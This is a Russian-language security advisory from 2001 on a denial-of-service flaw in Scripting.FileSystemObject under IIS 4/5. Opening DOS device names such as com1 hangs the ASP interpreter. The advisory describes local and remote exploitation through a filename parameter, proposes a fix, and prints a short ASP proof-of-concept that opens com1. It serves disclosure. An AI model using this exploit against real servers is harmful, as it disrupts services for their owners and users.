Ошибка класса devicefile crash в Scripting.FileSystemObject
- Дата публикации:
- 05.07.2001
- Дата изменения:
- 05.07.2001
- Всего просмотров:
- 1406
- Опасность:
- Наличие исправления:
- Количество уязвимостей:
- 1
- CVSSv2 рейтинг:
- CVE ID:
- Нет данных
- Вектор эксплуатации:
- Воздействие:
- CWE ID:
- Нет данных
- Наличие эксплоита:
- Нет данных
- Уязвимые продукты:
Как сообщила вчера российская хакерская группа NERF gr0up security, найдена
ошибка класса devicefile crash в Scripting.FileSystemObject в IIS 4,5.
Открытие и чтение файлов устройств (com1, com2 и т.д.) через
Scripting.FileSystemObject приводит к "зависанию" интерпретатора ASP-скриптов
(ASP.DLL).
Локальный эксплоит:
Злоумышленник, имеющий права на создание .asp-файла, может нарушить
работоспособность интерпретатора asp-скриптов веб-сервера.
Удаленный эксплоит:
иногда имя файла передается в качестве параметра .asp-скрипту, который в
дальнейшем выполняет его открытие и чтение из него.
Передав в качестве параметра имя устройства, можно вызвать зависание
интерпретатора.
Решение:
исправить Scripting.FileSystemObject так, чтобы он проверял файл на
существование перед открытием.
Эксплоит (попробовать вместо com1 другие файлы устройств):
<%
Dim strFileName, objFSO, objFile
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
strFileName = "com1"
Set objFile = objFSO.OpenTextFile(strFileName)
Response.Write objFile.ReadAll
objFile.Close
%>